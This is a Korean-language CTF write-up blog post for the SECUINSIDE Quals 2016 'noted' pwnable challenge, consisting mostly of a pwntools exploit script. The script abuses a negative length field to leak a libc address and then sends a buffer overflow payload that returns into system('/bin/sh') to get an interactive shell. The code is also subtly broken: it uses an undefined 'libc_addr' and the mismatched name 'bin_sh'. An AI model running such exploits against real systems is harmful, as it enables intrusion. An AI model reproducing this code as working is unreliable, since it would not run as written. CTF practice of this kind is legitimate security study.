cdor1's lab
SECUINSIDE Quals 2016 noted 본문
후기 : libc릭백터 찾는다고 디버깅을 열심히 했던 문제이다.
언제나 디버깅을 생활화하자
from pwn import *
s = remote('localhost', 4000)
def register(id, password):
print s.recvuntil('3) Exit')
s.sendline('2')
print s.recvuntil('id : ')
s.sendline(id)
print s.recvuntil('pw : ')
s.sendline(password)
def login(id, password):
print s.recvuntil('3) Exit')
s.sendline('1')
print s.recvuntil('id : ')
s.sendline(id)
print s.recvuntil('pw : ')
s.sendline(password)
def create_note(title):
print s.recvuntil('Menu')
s.sendline('2')
print s.recvuntil('title : ')
s.sendline(title)
print s.recvuntil('filedata length : ')
s.sendline('-1')
print s.recvuntil('password : ')
s.sendline("")
def edit_note(title):
print s.recvuntil('8) Logout')
s.sendline('4')
print s.recvuntil('title : ')
s.sendline(title)
print s.recvuntil('password : ')
s.sendline("")
print s.recvuntil('original data : ')
print s.recv(0x4cc)
base = u32(s.recv(4)) - 0x18637
binsh = libc_addr + 0x15909f
system_addr = libc_addr + 0x3a920
log.info("base : " + hex(base))
log.info("/bin/sh : " + hex(binsh))
log.info("system :" + hex(system_addr))
payload = "A" * 0x48c
payload += p32(system_addr)
payload += 'AAAA'
payload += p32(bin_sh)
s.sendline(payload)
print s.recvuntil('3) Exit')
register('cdor1', 'cdor1')
login('cdor1', 'cdor1')
create_note('a')
edit_note('a')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| 9447 CTF search engine (0) | 2017.01.18 |
|---|---|
| SECCON 2016 shopping (0) | 2017.01.17 |
| PoliCTF-2015 johns-library (0) | 2017.01.16 |
| H3X0R CTF comment (0) | 2017.01.13 |
| H3X0R CTF ezheap (0) | 2017.01.12 |
Comments